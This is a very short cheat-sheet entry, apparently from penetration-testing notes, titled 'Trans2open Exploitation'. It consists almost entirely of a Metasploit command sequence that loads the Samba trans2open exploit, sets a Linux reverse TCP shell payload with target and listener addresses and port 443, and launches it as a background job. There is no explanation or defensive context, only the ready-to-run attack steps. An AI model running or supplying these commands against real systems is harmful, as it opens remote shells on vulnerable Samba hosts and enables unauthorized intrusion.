Trans2open Exploitation
use exploit/linux/samba/trans2open set VERBOSE true set PAYLOAD linux/x86/shell_reverse_tcp set RHOST IP set LPORT 443 set LHOST IP exploit -j -z
Last updated 2 years ago